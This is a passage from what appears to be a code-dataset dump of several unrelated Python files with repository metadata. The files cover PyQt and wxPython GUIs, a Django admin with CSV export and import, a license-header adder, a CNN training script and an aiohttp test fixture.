self.bt_busca.setObjectName("bt_busca")
self.retranslateUi(Frame)
QtCore.QMetaObject.connectSlotsByName(Frame)
def retranslateUi(self, Frame):
_translate = QtCore.QCoreApplication.translate
Frame.setWindowTitle(_translate("Frame", "Lista de Produtos"))
self.lb_tituloClientes_2.setText(_translate("Frame", "PRODUTOS"))
self.bt_inserir.setText(_translate("Frame", "NOVO PRODUTO"))
item = self.tb_produtos.verticalHeaderItem(0)
item.setText(_translate("Frame", "1"))
item = self.tb_produtos.horizontalHeaderItem(0)
item.setText(_translate("Frame", "ID"))
item = self.tb_produtos.horizontalHeaderItem(1)
item.setText(_translate("Frame", "CODIGO DE BARRAS"))
item = self.tb_produtos.horizontalHeaderItem(2)
item.setText(_translate("Frame", "ESTOQUE"))
item = self.tb_produtos.horizontalHeaderItem(3)
item.setText(_translate("Frame", "DESCRIÇÃO"))
item = self.tb_produtos.horizontalHeaderItem(4)
item.setText(_translate("Frame", "MARCA"))
item = self.tb_produtos.horizontalHeaderItem(5)
item.setText(_translate("Frame", "PREÇO"))
item = self.tb_produtos.horizontalHeaderItem(6)
item.setText(_translate("Frame", "FORNECEDOR"))
item = self.tb_produtos.horizontalHeaderItem(7)
item.setText(_translate("Frame", "CATEGORIA"))
self.bt_selecionar.setText(_translate("Frame", "SELECIONAR"))
self.bt_refresh.setToolTip(_translate("Frame", "ATUALIZAR TABELA"))
self.tx_busca.setPlaceholderText(_translate("Frame", "PROCURAR POR..."))
self.cb_produtos.setItemText(0, _translate("Frame", "SELECIONE"))
self.bt_busca.setToolTip(_translate("Frame", "BUSCAR"))
| 43.537815 | 102 | 0.687898 | 1,196 | 10,362 | 5.829431 | 0.2199 | 0.060241 | 0.082329 | 0.025818 | 0.3821 | 0.271084 | 0.203385 | 0.171543 | 0.075445 | 0.044177 | 0 | 0.027338 | 0.177475 | 10,362 | 237 | 103 | 43.721519 | 0.790684 | 0.018626 | 0 | 0.254464 | 1 | 0 | 0.16729 | 0.011317 | 0 | 0 | 0 | 0 | 0 | 1 | 0.008929 | false | 0 | 0.004464 | 0 | 0.017857 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
a1c62a23cf4d05075c2ce8fd742ceaebabdfcf8f | 7,826 | py | Python | zyc/zyc.py | Sizurka/zyc | 5ed4158617293a613b52cb6197ca601a1b491660 | [
"MIT"
] | null | null | null | zyc/zyc.py | Sizurka/zyc | 5ed4158617293a613b52cb6197ca601a1b491660 | [
"MIT"
] | null | null | null | zyc/zyc.py | Sizurka/zyc | 5ed4158617293a613b52cb6197ca601a1b491660 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# MIT license
#
# Copyright (C) 2019 by XESS Corp.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
"""
GUI for finding/displaying parts and footprints.
"""
from __future__ import print_function
import os
import wx
from skidl import (
KICAD,
SchLib,
footprint_cache,
footprint_search_paths,
lib_search_paths,
skidl_cfg,
)
from .common import *
from .pckg_info import __version__
from .skidl_footprint_search import FootprintSearchPanel
from .skidl_part_search import PartSearchPanel
APP_TITLE = "zyc: SKiDL Part/Footprint Search"
APP_EXIT = 1
SHOW_HELP = 3
SHOW_ABOUT = 4
PART_SEARCH_PATH = 5
FOOTPRINT_SEARCH_PATH = 6
REFRESH = 7
class AppFrame(wx.Frame):
def __init__(self, *args, **kwargs):
super(self.__class__, self).__init__(*args, **kwargs)
self.panel = PartFootprintSearchPanel(self)
box = wx.BoxSizer(wx.VERTICAL)
box.Add(self.panel, proportion=1, flag=wx.ALL | wx.EXPAND, border=SPACING)
self.SetSizer(box)
# Keep border same color as background of panel.
self.SetBackgroundColour(self.panel.GetBackgroundColour())
self.InitMenus()
self.SetTitle(APP_TITLE)
self.Center()
self.Show(True)
self.Fit()
def InitMenus(self):
# Top menu.
menuBar = wx.MenuBar()
# File submenu containing quit button.
fileMenu = wx.Menu()
menuBar.Append(fileMenu, "&File")
quitMenuItem = wx.MenuItem(fileMenu, APP_EXIT, "Quit\tCtrl+Q")
fileMenu.Append(quitMenuItem)
self.Bind(wx.EVT_MENU, self.OnQuit, id=APP_EXIT)
# Search submenu containing search and copy buttons.
srchMenu = wx.Menu()
menuBar.Append(srchMenu, "&Search")
partSrchPathItem = wx.MenuItem(
srchMenu, PART_SEARCH_PATH, "Set part search path...\tCtrl+P"
)
srchMenu.Append(partSrchPathItem)
self.Bind(wx.EVT_MENU, self.OnPartSearchPath, id=PART_SEARCH_PATH)
footprintSrchPathItem = wx.MenuItem(
srchMenu, FOOTPRINT_SEARCH_PATH, "Set footprint search path...\tCtrl+F"
)
srchMenu.Append(footprintSrchPathItem)
self.Bind(wx.EVT_MENU, self.OnFootprintSearchPath, id=FOOTPRINT_SEARCH_PATH)
refreshItem = wx.MenuItem(srchMenu, REFRESH, "Refresh part + footprint paths")
srchMenu.Append(refreshItem)
self.Bind(wx.EVT_MENU, self.OnRefresh, id=REFRESH)
# Help menu containing help and about buttons.
helpMenu = wx.Menu()
menuBar.Append(helpMenu, "&Help")
helpMenuItem = wx.MenuItem(helpMenu, SHOW_HELP, "Help\tCtrl+H")
helpMenu.Append(helpMenuItem)
aboutMenuItem = wx.MenuItem(helpMenu, SHOW_ABOUT, "About App\tCtrl+A")
helpMenu.Append(aboutMenuItem)
self.Bind(wx.EVT_MENU, self.ShowHelp, id=SHOW_HELP)
self.Bind(wx.EVT_MENU, self.ShowAbout, id=SHOW_ABOUT)
self.SetMenuBar(menuBar)
def OnPartSearchPath(self, event):
# Update search path for parts.
dlg = TextEntryDialog(
self,
title="Set Part Search Path",
caption="Part Search Path",
tip="Enter {sep}-separated list of directories in which to search for parts.".format(
sep=os.pathsep
),
)
dlg.Center()
dlg.SetValue(os.pathsep.join(lib_search_paths[KICAD]))
if dlg.ShowModal() == wx.ID_OK:
lib_search_paths[KICAD] = dlg.GetValue().split(os.pathsep)
skidl_cfg.store() # Stores updated lib search path in file.
dlg.Destroy()
def OnFootprintSearchPath(self, event):
# Update search path for footprints.
dlg = TextEntryDialog(
self,
title="Set Footprint Search Path",
caption="Footprint Search Path",
tip="Enter {sep}-separated list of directories in which to search for fp-lib-table file.".format(
sep=os.pathsep
),
)
dlg.Center()
dlg.SetValue(os.pathsep.join(footprint_search_paths[KICAD]))
if dlg.ShowModal() == wx.ID_OK:
footprint_search_paths[KICAD] = dlg.GetValue().split(os.pathsep)
skidl_cfg.store() # Stores updated search path in file.
dlg.Destroy()
def OnRefresh(self, event):
SchLib.reset()
footprint_cache.reset()
def ShowHelp(self, e):
Feedback(
"""
1. Enter keywords/regex in the part search box.
2. Matching parts will appear in the Library/Part table.
3. Select a row in the Library/Part table to display part info.
4. Enter keywords/regex in the footprint search box.
5. Matching footprints will appear in the Library/Footprint table.
6. Select a row in the Library/Footprint table to display the footprint.
7. a) Click the Copy button in the Part Search panel to copy
the part & footprint to the clipboard, -OR-
b) Click the Copy button in the Footprint Search panel to copy
the footprint to the clipboard, -OR-
c) Deselect (ctrl-click) the footprint row and click the
Copy button in the Part Search panel to copy just
the part to the clipboard.
8. Paste the clipboard contents into your SKiDL code.
General:
* Drag sashes to resize individual panels.
* Double-click column headers to sort table contents.
* Ctrl-click to select/deselect table cells.
""",
"Help",
)
def ShowAbout(self, e):
Feedback(
APP_TITLE + " " + __version__
+ """
(c) 2019 XESS Corp.
https://github.com/xesscorp/skidl
MIT License
""",
"About",
)
def OnQuit(self, e):
self.Close()
class PartFootprintSearchPanel(wx.SplitterWindow):
def __init__(self, *args, **kwargs):
super(self.__class__, self).__init__(*args, **kwargs)
# Subpanel for part search panel.
self.part_panel = add_border(
add_title(PartSearchPanel(self), "Part Search", wx.TOP), wx.BOTTOM
)
# self.part_panel = box_it(PartSearchPanel(self), "Part Search")
# Subpanel for footprint search.
self.footprint_panel = add_border(
add_title(FootprintSearchPanel(self), "Footprint Search", wx.TOP), wx.TOP
)
# self.footprint_panel = box_it(FootprintSearchPanel(self), "Footprint Search")
# Split subpanels top/bottom.
self.SplitHorizontally(self.part_panel, self.footprint_panel, sashPosition=0)
self.SetSashGravity(0.5) # Both subpanels expand/contract equally.
self.Update()
def main():
# import wx.lib.inspection
app = wx.App()
AppFrame(None)
# wx.lib.inspection.InspectionTool().Show()
app.MainLoop()
if __name__ == "__main__":
main()
| 32.882353 | 109 | 0.662663 | 985 | 7,826 | 5.153299 | 0.299492 | 0.047281 | 0.016548 | 0.015366 | 0.246651 | 0.184988 | 0.135934 | 0.124507 | 0.124507 | 0.110323 | 0 | 0.004565 | 0.244314 | 7,826 | 237 | 110 | 33.021097 | 0.853568 | 0.224508 | 0 | 0.164179 | 0 | 0 | 0.109073 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.059701 | null | null | 0.156716 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
a1c6e9a43d6622094c50a6e5fb6886a83b2efa97 | 516 | py | Python | train/ip.py | VCG/gp | cd106b604f8670a70add469d41180e34df3b1068 | [
"MIT"
] | null | null | null | train/ip.py | VCG/gp | cd106b604f8670a70add469d41180e34df3b1068 | [
"MIT"
] | null | null | null | train/ip.py | VCG/gp | cd106b604f8670a70add469d41180e34df3b1068 | [
"MIT"
] | null | null | null | import cPickle as pickle
import os; import sys; sys.path.append('..')
import gp
import gp.nets as nets
PATCH_PATH = ('iplb')
X_train, y_train, X_test, y_test = gp.Patch.load_rgb(PATCH_PATH)
X_train = X_train[:,:-1,:,:]
X_test = X_test[:,:-1,:,:]
cnn = nets.RGNetPlus()
cnn = cnn.fit(X_train, y_train)
test_accuracy = cnn.score(X_test, y_test)
print test_accuracy
# store CNN
sys.setrecursionlimit(1000000000)
with open(os.path.expanduser('~/Projects/gp/nets/IP_FULL.p'), 'wb') as f:
pickle.dump(cnn, f, -1)
| 21.5 | 73 | 0.705426 | 90 | 516 | 3.844444 | 0.422222 | 0.069364 | 0.040462 | 0.069364 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.028761 | 0.124031 | 516 | 23 | 74 | 22.434783 | 0.736726 | 0.017442 | 0 | 0 | 0 | 0 | 0.071287 | 0.055446 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.266667 | null | null | 0.066667 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
a1d3d2bbc91fe562ff03d1024258dfe9a2092f42 | 4,237 | py | Python | main/admin.py | japmeet01/fplmanager-website | c7a533f49acb04ee56876dff8759bb68468b0592 | [
"MIT"
] | 5 | 2020-02-07T23:24:05.000Z | 2021-07-23T23:37:41.000Z | main/admin.py | japmeet01/fplmanager-website | c7a533f49acb04ee56876dff8759bb68468b0592 | [
"MIT"
] | 11 | 2020-01-13T10:02:33.000Z | 2022-02-10T14:42:36.000Z | main/admin.py | japmeet01/fplmanager-website | c7a533f49acb04ee56876dff8759bb68468b0592 | [
"MIT"
] | 11 | 2020-02-07T23:24:09.000Z | 2020-10-16T14:57:54.000Z | from django.contrib import admin
from django.http import HttpResponse
from django.urls import path
from django.shortcuts import render, HttpResponse, redirect
from django import forms
import os
import csv
from io import TextIOWrapper, StringIO
from .models import Player, Team, Usage, XgLookup
class CsvImportForm(forms.Form):
csv_file = forms.FileField()
class NoLoggingMixin:
def log_addition(self, *args):
return
def log_change(self, *args):
return
def log_deletion(self, *args):
return
class ExportCsvMixin:
def export_as_csv(self, request, queryset):
meta = self.model._meta
field_names = [field.name for field in meta.fields]
response = HttpResponse(content_type='text/csv')
response['Content-Disposition'] = 'attachment; filename={}.csv'.format(meta)
writer = csv.writer(response)
writer.writerow(field_names)
for obj in queryset:
row = writer.writerow([getattr(obj, field) for field in field_names])
return response
def export_delete_as_csv(self, request, queryset):
meta = self.model._meta
field_names = [field.name for field in meta.fields]
response = HttpResponse(content_type='text/csv')
response['Content-Disposition'] = 'attachment; filename={}.csv'.format(meta)
writer = csv.writer(response)
writer.writerow(field_names)
for obj in queryset:
row = writer.writerow([getattr(obj, field) for field in field_names])
obj.delete()
return response
export_as_csv.short_description = "Export Selected"
export_delete_as_csv.short_description = "Export and Delete Selected"
class UploadCsvMixin:
def get_urls(self):
urls = super().get_urls()
my_urls = [
path('import-csv/', self.import_csv)
]
return my_urls + urls
def import_csv(self, request):
if request.method == 'POST':
csv_file = TextIOWrapper(request.FILES['csv_file'].file, encoding=request.encoding)
extension = os.path.splitext(request.FILES['csv_file'].name)[1]
if extension == '.csv':
reader = csv.reader(csv_file)
headers = next(reader)
model_fields = [m.name for m in self.model._meta.fields if m.name != 'updated']
# if set(headers) == set(model_fields):
input_data = [dict(zip(headers, row)) for row in reader]
for i in input_data:
t = self.model()
[setattr(t, k, v) for k, v in i.items()]
t.save()
# else:
# self.message_user(request, "Bad headers - unable to import selected file. Expected headers: '{expected}' Received headers: '{actual}'".format(
# expected=model_fields,
# actual=headers
# ), level='ERROR')
# return redirect("..")
else:
self.message_user(request, 'Incorrect file type', level='ERROR')
return redirect('..')
self.message_user(request, "Your csv file has been imported")
return redirect("..")
form = CsvImportForm()
payload = {"form": form}
return render(
request, "custom_admin/csv_form.html", payload
)
@admin.register(Player)
class PlayerAdmin(NoLoggingMixin, ExportCsvMixin, admin.ModelAdmin):
readonly_fields = ('updated',)
actions = ['export_as_csv']
@admin.register(Team)
class TeamAdmin(NoLoggingMixin, ExportCsvMixin, admin.ModelAdmin):
readonly_fields = ('updated',)
actions = ['export_as_csv']
@admin.register(Usage)
class UsageAdmin(NoLoggingMixin, ExportCsvMixin, admin.ModelAdmin):
readonly_fields = ('updated',)
actions = ['export_as_csv', 'export_delete_as_csv']
@admin.register(XgLookup)
class XgLookupAdmin(NoLoggingMixin, UploadCsvMixin, ExportCsvMixin, admin.ModelAdmin):
change_list_template = 'custom_admin/models_changelist.html'
readonly_fields = ('updated',)
actions = ['export_as_csv'] | 31.619403 | 164 | 0.618126 | 467 | 4,237 | 5.466809 | 0.271949 | 0.017626 | 0.025852 | 0.04387 | 0.406189 | 0.349001 | 0.349001 | 0.333725 | 0.333725 | 0.333725 | 0 | 0.000326 | 0.275903 | 4,237 | 134 | 165 | 31.619403 | 0.831812 | 0.068917 | 0 | 0.314607 | 0 | 0 | 0.105383 | 0.01549 | 0 | 0 | 0 | 0 | 0 | 1 | 0.078652 | false | 0 | 0.157303 | 0.033708 | 0.539326 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
a1e396a0fe0bfe84f4e348a5cd7eab9d9e2a1638 | 2,962 | py | Python | filemanipulator.py | paulkramme/mit-license-adder | 1865413c1932a3108883dc2b77c67608d56be275 | [
"MIT"
] | null | null | null | filemanipulator.py | paulkramme/mit-license-adder | 1865413c1932a3108883dc2b77c67608d56be275 | [
"MIT"
] | null | null | null | filemanipulator.py | paulkramme/mit-license-adder | 1865413c1932a3108883dc2b77c67608d56be275 | [
"MIT"
] | null | null | null | #!/usr/bin/python2
import tempfile
import sys
import datetime
mit_license = ("""\
/*
MIT License
Copyright (c) 2016 Paul Kramme
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
*/
""")
class FileModifierError(Exception):
pass
class FileModifier(object):
def __init__(self, fname):
self.__write_dict = {}
self.__filename = fname
self.__tempfile = tempfile.TemporaryFile()
with open(fname, 'rb') as fp:
for line in fp:
self.__tempfile.write(line)
self.__tempfile.seek(0)
def write(self, s, line_number = 'END'):
if line_number != 'END' and not isinstance(line_number, (int, float)):
raise FileModifierError("Line number %s is not a valid number" % line_number)
try:
self.__write_dict[line_number].append(s)
except KeyError:
self.__write_dict[line_number] = [s]
def writeline(self, s, line_number = 'END'):
self.write('%s\n' % s, line_number)
def writelines(self, s, line_number = 'END'):
for ln in s:
self.writeline(s, line_number)
def __popline(self, index, fp):
try:
ilines = self.__write_dict.pop(index)
for line in ilines:
fp.write(line)
except KeyError:
pass
def close(self):
self.__exit__(None, None, None)
def __enter__(self):
return self
def __exit__(self, type, value, traceback):
with open(self.__filename,'w') as fp:
for index, line in enumerate(self.__tempfile.readlines()):
self.__popline(index, fp)
fp.write(line)
for index in sorted(self.__write_dict):
for line in self.__write_dict[index]:
fp.write(line)
self.__tempfile.close()
filename = sys.argv[1]
#license = sys.argv[1]
print "Licenseadder by Paul Kramme"
with FileModifier(filename) as fp:
fp.writeline(mit_license, 0)
| 32.911111 | 89 | 0.668467 | 402 | 2,962 | 4.766169 | 0.402985 | 0.057411 | 0.04071 | 0.023486 | 0.052192 | 0 | 0 | 0 | 0 | 0 | 0 | 0.004041 | 0.248143 | 2,962 | 89 | 90 | 33.280899 | 0.856309 | 0.012829 | 0 | 0.126761 | 0 | 0 | 0.396304 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.028169 | 0.042254 | null | null | 0.014085 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
a1efd6d129721046eb1d2381c5f7945eeeb81f90 | 431 | py | Python | tests/conftest.py | asvetlov/aiohttp_mako | 8fb66bd35b8cb4a2fa91e33f3dff918e4798a15a | [
"Apache-2.0"
] | 24 | 2016-12-25T16:24:45.000Z | 2020-04-07T14:39:28.000Z | tests/conftest.py | jettify/aiohttp_mako | 8fb66bd35b8cb4a2fa91e33f3dff918e4798a15a | [
"Apache-2.0"
] | 168 | 2016-11-12T20:50:34.000Z | 2022-03-18T02:09:08.000Z | tests/conftest.py | jettify/aiohttp_mako | 8fb66bd35b8cb4a2fa91e33f3dff918e4798a15a | [
"Apache-2.0"
] | 9 | 2016-12-13T10:48:26.000Z | 2020-09-17T10:42:40.000Z | import sys
import pytest
import aiohttp_mako
from aiohttp import web
@pytest.fixture
def app():
app = web.Application()
lookup = aiohttp_mako.setup(app, input_encoding='utf-8',
output_encoding='utf-8',
default_filters=['decode.utf8'])
tplt = "<html><body><h1>${head}</h1>${text}</body></html>"
lookup.put_string('tplt.html', tplt)
return app
| 22.684211 | 64 | 0.584687 | 52 | 431 | 4.730769 | 0.596154 | 0.089431 | 0.097561 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.015974 | 0.273782 | 431 | 18 | 65 | 23.944444 | 0.769968 | 0 | 0 | 0 | 0 | 0 | 0.183295 | 0.113689 | 0 | 0 | 0 | 0 | 0 | 1 | 0.076923 | false | 0 | 0.307692 | 0 | 0.461538 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
a1fbde784a20640d80d64437aa8dd036428fff1c | 15,105 | py | Python | CCMtask/ccm.py | yyFFans/DemoPractises | e0e08413efc598489401c8370f4c7762b3493851 | [
"MIT"
] | null | null | null | CCMtask/ccm.py | yyFFans/DemoPractises | e0e08413efc598489401c8370f4c7762b3493851 | [
"MIT"
] | null | null | null | CCMtask/ccm.py | yyFFans/DemoPractises | e0e08413efc598489401c8370f4c7762b3493851 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'ccm.ui'
#
# Created by: PyQt5 UI code generator 5.13.2
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_CCMTask(object):
def setupUi(self, CCMTask):
CCMTask.setObjectName("CCMTask")
CCMTask.resize(712, 585)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Ignored, QtWidgets.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(CCMTask.sizePolicy().hasHeightForWidth())
CCMTask.setSizePolicy(sizePolicy)
CCMTask.setAutoFillBackground(False)
self.centralwidget = QtWidgets.QWidget(CCMTask)
self.centralwidget.setObjectName("centralwidget")
self.issueBox = QtWidgets.QGroupBox(self.centralwidget)
self.issueBox.setGeometry(QtCore.QRect(10, 110, 691, 55))
self.issueBox.setObjectName("issueBox")
self.horizontalLayout_3 = QtWidgets.QHBoxLayout(self.issueBox)
self.horizontalLayout_3.setObjectName("horizontalLayout_3")
self.ARDTSEdit = QtWidgets.QLineEdit(self.issueBox)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Expanding)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.ARDTSEdit.sizePolicy().hasHeightForWidth())
self.ARDTSEdit.setSizePolicy(sizePolicy)
self.ARDTSEdit.setTabletTracking(True)
self.ARDTSEdit.setObjectName("ARDTSEdit")
self.horizontalLayout_3.addWidget(self.ARDTSEdit)
spacerItem = QtWidgets.QSpacerItem(70, 20, QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout_3.addItem(spacerItem)
self.issueInfoEdit = QtWidgets.QLineEdit(self.issueBox)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Expanding)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.issueInfoEdit.sizePolicy().hasHeightForWidth())
self.issueInfoEdit.setSizePolicy(sizePolicy)
self.issueInfoEdit.setTabletTracking(True)
self.issueInfoEdit.setObjectName("issueInfoEdit")
self.horizontalLayout_3.addWidget(self.issueInfoEdit)
self.label = QtWidgets.QLabel(self.issueBox)
self.label.setText("")
self.label.setObjectName("label")
self.horizontalLayout_3.addWidget(self.label)
self.issueDetailBox = QtWidgets.QGroupBox(self.centralwidget)
self.issueDetailBox.setGeometry(QtCore.QRect(10, 170, 691, 401))
self.issueDetailBox.setCursor(QtGui.QCursor(QtCore.Qt.ArrowCursor))
self.issueDetailBox.setTabletTracking(True)
self.issueDetailBox.setObjectName("issueDetailBox")
self.deletedParamsBox = QtWidgets.QGroupBox(self.issueDetailBox)
self.deletedParamsBox.setGeometry(QtCore.QRect(500, 20, 161, 271))
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.deletedParamsBox.sizePolicy().hasHeightForWidth())
self.deletedParamsBox.setSizePolicy(sizePolicy)
self.deletedParamsBox.setObjectName("deletedParamsBox")
self.deletedParamsEdit = QtWidgets.QTextEdit(self.deletedParamsBox)
self.deletedParamsEdit.setGeometry(QtCore.QRect(10, 20, 141, 231))
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.deletedParamsEdit.sizePolicy().hasHeightForWidth())
self.deletedParamsEdit.setSizePolicy(sizePolicy)
self.deletedParamsEdit.setObjectName("deletedParamsEdit")
self.opkeysBox_2 = QtWidgets.QGroupBox(self.issueDetailBox)
self.opkeysBox_2.setGeometry(QtCore.QRect(10, 210, 153, 182))
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.opkeysBox_2.sizePolicy().hasHeightForWidth())
self.opkeysBox_2.setSizePolicy(sizePolicy)
self.opkeysBox_2.setObjectName("opkeysBox_2")
self.verticalLayout_2 = QtWidgets.QVBoxLayout(self.opkeysBox_2)
self.verticalLayout_2.setObjectName("verticalLayout_2")
self.opkey1Edit_2 = QtWidgets.QLineEdit(self.opkeysBox_2)
self.opkey1Edit_2.setTabletTracking(True)
self.opkey1Edit_2.setText("")
self.opkey1Edit_2.setPlaceholderText("")
self.opkey1Edit_2.setObjectName("opkey1Edit_2")
self.verticalLayout_2.addWidget(self.opkey1Edit_2)
self.opkey2Edit_2 = QtWidgets.QLineEdit(self.opkeysBox_2)
self.opkey2Edit_2.setTabletTracking(True)
self.opkey2Edit_2.setText("")
self.opkey2Edit_2.setPlaceholderText("")
self.opkey2Edit_2.setObjectName("opkey2Edit_2")
self.verticalLayout_2.addWidget(self.opkey2Edit_2)
self.opkey3Edit_2 = QtWidgets.QLineEdit(self.opkeysBox_2)
self.opkey3Edit_2.setTabletTracking(True)
self.opkey3Edit_2.setText("")
self.opkey3Edit_2.setPlaceholderText("")
self.opkey3Edit_2.setObjectName("opkey3Edit_2")
self.verticalLayout_2.addWidget(self.opkey3Edit_2)
self.opkey4Edit_2 = QtWidgets.QLineEdit(self.opkeysBox_2)
self.opkey4Edit_2.setTabletTracking(True)
self.opkey4Edit_2.setText("")
self.opkey4Edit_2.setPlaceholderText("")
self.opkey4Edit_2.setObjectName("opkey4Edit_2")
self.verticalLayout_2.addWidget(self.opkey4Edit_2)
self.opkey5Edit_2 = QtWidgets.QLineEdit(self.opkeysBox_2)
self.opkey5Edit_2.setTabletTracking(True)
self.opkey5Edit_2.setText("")
self.opkey5Edit_2.setPlaceholderText("")
self.opkey5Edit_2.setObjectName("opkey5Edit_2")
self.verticalLayout_2.addWidget(self.opkey5Edit_2)
self.opkey6Edit_2 = QtWidgets.QLineEdit(self.opkeysBox_2)
self.opkey6Edit_2.setTabletTracking(True)
self.opkey6Edit_2.setText("")
self.opkey6Edit_2.setPlaceholderText("")
self.opkey6Edit_2.setClearButtonEnabled(False)
self.opkey6Edit_2.setObjectName("opkey6Edit_2")
self.verticalLayout_2.addWidget(self.opkey6Edit_2)
self.splitter_2 = QtWidgets.QSplitter(self.issueDetailBox)
self.splitter_2.setGeometry(QtCore.QRect(10, 20, 153, 182))
self.splitter_2.setOrientation(QtCore.Qt.Vertical)
self.splitter_2.setObjectName("splitter_2")
self.opkeysBox = QtWidgets.QGroupBox(self.splitter_2)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.opkeysBox.sizePolicy().hasHeightForWidth())
self.opkeysBox.setSizePolicy(sizePolicy)
self.opkeysBox.setObjectName("opkeysBox")
self.verticalLayout = QtWidgets.QVBoxLayout(self.opkeysBox)
self.verticalLayout.setObjectName("verticalLayout")
self.opkey1Edit = QtWidgets.QLineEdit(self.opkeysBox)
self.opkey1Edit.setTabletTracking(True)
